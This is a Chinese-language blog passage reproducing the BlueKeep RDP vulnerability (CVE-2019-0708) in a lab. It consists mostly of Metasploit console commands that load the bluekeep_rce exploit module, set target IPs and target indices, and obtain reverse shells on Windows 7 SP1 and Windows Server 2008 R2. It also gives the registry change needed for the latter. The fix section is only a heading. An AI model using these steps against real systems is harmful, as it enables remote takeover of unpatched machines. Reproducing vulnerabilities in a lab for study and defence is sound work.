Windows RDP的RCE漏洞分析和复现(CVE-2019-0708)(7)
MSF下执行如下命令: msfconsole msf5>reload_all ? #重新加载所有模块msf5 > search cve_2019_0708_bluekeep_rce msf5>use exploit/windows/rdp/cve_2019_0708_bluekeep_rce msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) >info msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 192.168.1.7 msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 1 #如果设置目标为3(set taget 3),可能会出现蓝屏现象,因此这里设置target 1(我这里是exis中的主机) msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit? meterprter>shell ? 可以看到成功反弹win7sp1 系统shell,根据实际情况选择target(可以先测试3再测试2再测试1)(2) 攻击window 2008r2 ?sp1漏洞复现需要修改注册表[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\rdp-tcp\fDisableCam]值修改为0(系统默认为1) 在MSF下执行如下命令: msf5 > search cve_2019_0708_bluekeep_rce msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce? msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > info msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 192.168.1.10 msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rport 3389 msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 2 msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit? ? 可以看到成功反弹出目标win2008 r2的shell,该漏洞有点鸡肋,目前测试时windows2008 r2 sp1 english版本且需要修改注册表才能成功利用。0x05 漏洞修复建议CVE-2019-0708漏洞修复补丁以及安全建议 (编辑:ASP站长网) |